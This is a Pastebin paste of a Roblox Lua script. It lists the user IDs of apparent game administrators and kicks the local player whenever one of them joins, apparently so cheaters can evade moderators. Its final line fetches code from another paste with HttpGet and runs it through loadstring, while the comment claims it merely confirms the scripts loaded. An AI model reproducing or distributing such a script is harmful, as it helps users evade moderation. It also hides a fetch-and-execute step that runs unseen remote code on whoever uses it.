Aethielbx

Blacksite Zeta Admin Leave

Apr 18th, 2021 (edited)
653
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.88 KB | None | 0 0
  1. local banList = { -- This is the list of all the people that will alert you
  2. [30898713] = "JapolNation";
  3. [115097749] = "HitByBus";
  4. [131255419] = "CursedAuroras";
  5. [1050749522] = "Nominets";
  6. [226260459] = "carface003";
  7. [24985610] = "lukasz88";
  8. [236773970] = "xinser";
  9. [16157689] = "MATTHEW9873529";
  10. [26328143] = "NotYeetery";
  11. [141210555] = "OracleForReal";
  12. [1361214990] = "23note";
  13. [69761691] = "PurFusiion";
  14. [287682353] = "CeIsior";
  15. [1035365524] = "BlackWidowVenomB2000";
  16. [55549140] = "Qxest";
  17. [96545156] = "v_1xm";
  18. [492125221] = "BasedEntertainment";
  19. [162574053] = "OriginOfGuests";
  20. [113270296] = "Zytarr";
  21. [339971721] = "p7stol";
  22. [455919575] = "ResumeKepler";
  23. [1507754205] = "Developing_Maniac";
  24. [251893406] = "XxXxfirexX";
  25. [149063693] = "EpicNetherEvan";
  26. [547555032] = "exp_xm";
  27. [129743625] = "Bayonettz";
  28. [106741957] = "RealNemesisHours";
  29. [53981661] = "Soliform";
  30. [1065026095] = "Cyficion";
  31. [2046643284] = "fahattt01";
  32. [781311356] = "MoonRun3s";
  33. [123175128] = "85kf";
  34. [881399] = "aqu_xm";
  35. [116170905] = "6_1o";
  36. [205253655] = "Administrator_Spider";
  37. [180287525] = "AncientRain59";
  38. [148576487] = "1ized";
  39. [116174013] = "StampSGC";
  40. [1183554248] = "CobrainOne";
  41. [363979106] = "EthineKorbius";
  42. [1416904748] = "Gravity_txt";
  43. [302850896] = "MrMemetic";
  44. [1894684198] = "nota_lazydev";
  45. [108898368] = "ShipMaster_Caine";
  46. [43586170] = "vMalware";
  47. [73289787] = "PoneTech";
  48. [1564561728] = "vRansomware";
  49. [76694254] = "TinyEndoskeletonGuy";
  50. [215129134] = "SquishyTheCop";
  51. [1143654896] = "EvilEyeRule";
  52. [654872648] = "dayflare";
  53. [307943609] = "matyas095";
  54. [154021661] = "TerabyteScroll";
  55. [304307201] = "Termexs";
  56. [31523738] = "AceInitiative";
  57. [235861742] = "StrategicalWolffe";
  58. [82282083] = "bobsingin";
  59. [80973635] = "Innsomnnia";
  60. [82166861] = "SeraphicVaxus";
  61. [1271601423] = "nakkham";
  62. [656083822] = "Azyahlaw";
  63. [29624845] = "boycool3";
  64. [169138949] = "ClearlyTrial";
  65. [150100363] = "JackBoiss_7271";
  66. [121485456] = "Jamtri73";
  67. [329979194] = "Zatotek";
  68. [610522289] = "Cxrrupted_Reality";
  69. [650055685] = "DrawingEchelon";
  70. [610522289] = "IIKatarn";
  71. [59573696] = "Deadlypeanut1";
  72. [3653874] = "aii_duck";
  73. [581593413] = "imnot_catifat";
  74. [2743838839] = "Paxodia";
  75. [28985094] = "Survivor4321";
  76. [2519753503] = "ProjectRedactedDEBUG";
  77. }
  78.  
  79. game.Players.PlayerAdded:Connect(function(player)
  80. if banList[player.UserId] then
  81. game.Players.LocalPlayer:Kick("An admin has joined the game.")
  82. end
  83. end)
  84. loadstring(game:HttpGet(('https://pastebin.com/raw/JcGueyQc'),true))() -- Tells you all scripts got loaded correctly
Advertisement
Add Comment
Please, Sign In to add comment